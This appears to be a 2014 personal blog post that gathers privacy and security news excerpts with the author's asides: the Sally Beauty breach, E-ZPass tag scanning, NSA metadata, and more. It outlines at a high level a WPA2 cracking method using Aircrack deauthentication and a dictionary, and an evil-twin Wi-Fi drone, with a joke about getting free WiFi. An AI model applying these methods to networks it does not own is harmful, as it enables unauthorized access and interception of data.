Very interesting
graphic of the military downsizing after the fall of the Soviet
Union. Let's hope all those nukes went back to Russia or were
dismantled.
Ukraine
Battles to Rebuild a Depleted Military
As the Kremlin began
its invasion of the Ukrainian peninsula of Crimea last month, a
days-old government in Kiev turned to its military to stem the tide.
There was an immediate problem: No car batteries for the military
vehicles.
With coffers empty,
Ukraine's fledgling government appealed to the U.S. embassy for help.
The embassy said it would take weeks to get assistance, so the
government had to search—among its own people—to find a regional
oligarch, Ihor Kolomoisky, to kick in the funds to buy them locally.
I am coming to the
conclusion that it IS smart to deliberately understate the size of a
breach in the early releasses os information. Apparently, when you
get around to correcting (admitting) the numbers, no one in the media
truly cares.
ZIP
Codes Show Extent of Sally Beauty Breach
Earlier this month,
beauty products chain Sally Beauty acknowledged
that a hacker break-in compromised fewer than 25,000 customer credit
and debit cards. My previous
reporting indicated that the true size of the breach was at least
ten times larger. The analysis published in this post suggests that
the Sally Beauty breach may have impacted virtually all 2,600+ Sally
Beauty locations nationwide.
… I asked Sally
Beauty to comment on my findings. They declined again to offer any
more detail on the breach, issuing the following statement:
“As
experience has shown in prior data security incidents at other
companies, it is difficult to ascertain with certainty the scope of a
data security incident prior to the completion of a comprehensive
forensic investigation. As a result, we will not speculate as to the
scope or nature of the data security incident. Please check
sallybeautyholdings.com
for updates.”
[Note
that they do not say that they haven't already completed their
investigation. Bob]
The zip code analysis
is available in this
.csv spreadsheet.
I ask you, how would
Christie know when to close lanes onto the bridge without this?
Cindy Weightman
I’m
driving around Bergen County. That sound you’re hearing is a
device that alerts you any time your E-ZPass tag is scanned. The
problem is that it’s going off like crazy and there isn’t a toll
booth in sight. The device was created by a man who is protective of
his privacy, but still wanted an alias that makes a splash. His
cover name is Puking
Monkey. Our ride takes us on the feeder roads surrounding the
George Washington Bridge including Routes 46 and 4 in Fort Lee and up
the northbound side of the Palisades Parkway and all the while this
detector keeps going off, even though during that entire time, we
didn’t go near a single toll booth.
Read more on WBGO.
It's simple. Just put
FBI “Stingray” technology in a drone. Why didn't the FBI think
of that. (Of course they did)
… London-based
Sensepoint security researchers have developed a drone called
'Snoopy' that can intercept data from your Smartphones
using spoofed wireless networks, CNN
Money reported.
The Drone will search
for WiFi enabled devices and then using its built-in technology, it
will see what networks the phones have accessed in the past and
pretends to be one of those old network connections.
Spoofing WiFi networks
that device has already accessed allows Snoopy Drone to connect with
targeted Smartphone without authentication or interaction. In
technical terms, The Drone will use 'Wireless Evil Twin Attack'
to hack Smartphones.
Perhaps I see this
differently. It is easy to ignore communication that does not
originate or terminate at specific locations, or involve specific
individuals (or countries). All you need is the guts to face the
possibility that the next terrorist act would have been easily
prevented if you had been monitoring that communications link.
The New York Times
report
that President Obama will call for an end to the bulk collection
of American’s telephone metadata is yet further vindication for
Edward Snowden in particular, and for transparency more generally.
The only reason the President is proposing this change is because,
once the program became public, it was unsustainable in its current
form.
(Related) Will we lose
this ability?
Ellen Nakashima
reports:
Federal
agents notified more than 3,000 U.S. companies last year that their
computer systems had been hacked, White House officials have told
industry executives, marking the first time the
government has revealed how often it tipped off the private sector to
cyberintrusions.
The
alerts went to firms large and small, from local banks to major
defense contractors to national retailers such as Target, which
suffered a breach last fall that led to the theft of tens of millions
of Americans’ credit card and personal data, according to
government and industry officials.
Read more on the
Washington
Post.
It would be nice to
know how many of those 3,000 cases involved breaches of personal
information databases as opposed to trade secrets or intellectual
property, but it’s good that the government is sharing what it has
learned with targeted entities.
[From
the article:
The number reflects
only a fraction of the true
scale of cyberintrusions into the private sector by criminal
groups and foreign governments and their proxies, particularly in
China and Eastern Europe.
While some companies
are encouraging BYOD, others are requiring employees to stop any
personal use of their equipment. (My wife tells me I must buy her a
cellphone and a computer.)
UK
– Bring your own device (BYOD)
by Sabrina
I. Pacifici on March 24, 2014
Bring
your own device guidance: “Bring your own device is a term
which refers to when employees use their personal computing devices
(typically smart phones and tablets) in the workplace. Permitting
devices which you do not have sufficient control over to connect to
the corporate IT systems can introduce a range of security
vulnerabilities and other data protection concerns if not correctly
managed. This guidance explores what you need to consider if
permitting the use of personal devices to process personal data for
which you are responsible.”
My favorite scofflaw.
(He's hardly a “fugitive” unless that means something different
in new Zealandese) Think I might buy a few shares...
Cyber
fugitive Dotcom mocks authorities: 'From 0 into a $210m company'
Kim Dotcom, one of the world's most wanted cyber fugitives, on
Tuesday gloated over a deal that will see a cloud storage firm he
founded while on bail listing on the New Zealand stock exchange and
valued on paper at NZ$210 million ($179 million).
The flashy internet mogul, who also goes by the name Kim Schmitz, is
fighting a bid by U.S. authorities to extradite him from his lavish
estate in New Zealand to face online piracy charges over the now
closed file sharing site Megaupload.
… New Zealand company records show Mega Ltd's shareholders
include Dotcom's wife, through a trust, with a 26 percent stake.
Dotcom is not listed as a shareholder nor a director, but on the Mega
website he is called principal strategist.
(Related) Why are New
Zealand and Australia overreacting so easily?
Doubts
over computer hacker case
Matthew Flannery, 24,
of Point Clare, was allegedly an international hacking group leader
when he was arrested while at work at a Sydney IT security firm last
April and charged with computer crime offences carrying jail terms of
up to 10 years.
But in Woy Woy Local
Court this month magistrate Derek Lee was told Mr Flannery expected
to apply in May to have all charges against him withdrawn and
dismissed.
The application will
come after the Commonwealth Office of the Director of Public
Prosecutions over the past year has downgraded the case from the
District Court to the Local Court, modified the charges, sought six
adjournments and agreed to vary Mr Flannery’s bail so that he was
not required to report to police three times a week.
For my students to get
the most out of their technology training...
Tech
Videos — Best Of The Best YouTube Technology Channels
New technology, be it
gadgets, computers or broader innovations, can be difficult to
understand. Fortunately, there are a number of YouTube channels that
help you get a grasp on the latest and greatest. These sources
provide news, reviews and in-depth look at what’s shaping the
future. Here are ten must-watch channels every geek should subscribe
to.
For my Computer
Security (and Ethical Hacking) students. What's better than a Free
WiFi site? A “Make Any WiFi Site Free” tool!
Researchers
Outline How to Crack WPA2 Security
Published
in the International Journal of Information and Computer Security,
the research outlines how the Wi-Fi Protected Access 2 (WPA2)
protocol can be potentially exposed using deauthentication and brute
force attacks.
"Thus
far, WPA2 is considered to be amongst the most secure protocols,"
according to the researchers'
paper. "However it has several security vulnerabilities.
Until now there has not been a complete and fully successful
methodology capable of exposing the WPA2 security. This paper
provides a novel way of successfully exposing WPA2 security issues by
using a complete dictionary that generates all the possible printable
ASCII characters of all possible lengths."
… "At
the beginning, the area was scanned-sniffed with ‘Airodump’ and
then a deauthentication attack was made with ‘Aireplay’,"
according to the paper. "Through that, an instance of the PSK
was caught. Finally, ‘Aircrack’ was attempting to reveal the
secret password by using the instance of the PSK and matching it with
every record of the dictionary. For these experiments we
used a very big [Please!
This would fit easily on a small thumb drive. Bob]
dictionary that consisted of 666,696 standard printable ASCII
character records of various lengths. ‘Airodump’ and ‘Aireplay’
are commands of the ‘Aircrack’ suite, responsible for sniffing
and deauthentication respectively." [Aircrack
is a free wifi network Auditing tool. Bob]
In
all but one of the cases, the key was easily found, the researchers
stated.
… The
best way to protect an 802.11i network is through the use of WPA2 in
combination with MAC filtering, the researchers recommend. In
addition, changing the encryption key periodically can increase the
level of difficulty for attackers. The more complex the password,
the more the difficulty will rise as well.
Apparently there is a
market (audience) for anything.
Watch
Jerry Seinfeld’s Web Series: Comedians In Cars Getting Coffee
[Stuff to Watch]
American comedian Jerry
Seinfeld is probably best known for the sitcom that shares his
surname, but his latest venture takes the form of a free
online web series. Titled Comedians
In Cars Getting Coffee, the show involves Jerry Seinfeld driving
famous comedians around in classic sports cars, before stopping for a
cup of coffee.
The brilliance lies in
the simplicity of the format which not
only celebrates comedy, but classic cars and the ability
to talk at length about virtually nothing at all. The show is now in
its third season, with a total of 23 episodes online for your
perusal.
No comments:
Post a Comment